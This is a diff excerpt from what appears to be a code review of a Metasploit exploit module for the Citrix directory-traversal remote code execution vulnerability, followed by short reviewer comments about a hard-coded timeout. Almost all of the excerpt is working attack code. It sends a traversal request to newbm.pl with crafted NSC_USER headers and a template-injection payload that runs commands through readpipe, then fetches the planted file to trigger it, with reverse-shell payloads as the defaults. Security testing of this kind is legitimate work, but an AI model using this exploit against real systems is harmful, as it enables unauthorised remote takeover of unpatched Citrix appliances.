modules/exploits/linux/http/citrix_dir_traversal_rce.rb

```diff
@@ -0,0 +1,148 @@
+          'Type'           => :python,
+          'DefaultOptions' => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'}
+        ],
+        ['Unix Command',
+          'Platform'       => 'unix',
+          'Arch'           => ARCH_CMD,
+          'Type'           => :unix_command,
+          'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'}
+        ]
+      ],
+      'DefaultTarget'      => 0,
+      'DefaultOptions'     => {
+        'CheckModule'      => 'auxiliary/scanner/http/citrix_dir_traversal'
+      },
+      'Notes'              => {
+        'AKA'              => ['Shitrix'],
+        'Stability'        => [CRASH_SAFE],
+        'Reliability'      => [REPEATABLE_SESSION],
+        'SideEffects'      => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+      }
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ])
+  end
+
+  def cmd_unix_generic?
+    datastore['PAYLOAD'] == 'cmd/unix/generic'
+  end
+
+  def exploit
+    unless datastore['ForceExploit']
+      case check
+      when CheckCode::Vulnerable
+        print_good('The target appears to be vulnerable')
+      when CheckCode::Safe
+        fail_with(Failure::NotVulnerable, 'The target does not appear to be vulnerable')
+      else
+        fail_with(Failure::Unknown, 'The target vulnerability state is unknown')
+      end
+    end
+
+    print_status("Yeeting #{datastore['PAYLOAD']} payload at #{peer}")
+    vprint_status("Generated payload: #{payload.encoded}")
+
+    case target['Type']
+    when :python
+      execute_command(%(/var/python/bin/python2 -c "#{payload.encoded}"))
+    when :unix_command
+      if (res = execute_command(payload.encoded)) && cmd_unix_generic?
+        print_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, ''))
+      end
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    filename = rand_text_alpha(8..42)
+    nonce    = rand_text_alpha(8..42)
+
+    res = send_request_cgi(
+      'method'      => 'POST',
+      'uri'         => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'),
+      'headers'     => {
+        'NSC_USER'  => "../../../netscaler/portal/templates/#{filename}",
+        'NSC_NONCE' => nonce
+      },
+      'vars_post'   => {
+        'url'       => rand_text_alpha(8..42),
+        'title'     => "[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]"
+      }
+    )
+
+    unless res && res.code == 200
+      print_error('No response to POST newbm.pl request')
+      return
+    end
+
+    res = send_request_cgi({
+      'method'      => 'GET',
+      'uri'         => normalize_uri(target_uri.path, "/vpn/../vpns/portal/#{filename}.xml"),
+      'headers'     => {
+        'NSC_USER'  => rand_text_alpha(8..42),
+        'NSC_NONCE' => nonce
+      }
+    }, cmd_unix_generic? ? 60 : 3.5)
```

Comment:
Hard-coded 3.5 seconds? What if I'm DNS tunneling from the moon behind 7 proxies?

Reply:
I feel like I should just remove this stupid magic code and make the user wait it out. They can tweak `HttpClientTimeout`, anyway.

Reply:
I added `partial`, anyway. I'm getting rid of the magic. Bad habit for anyone.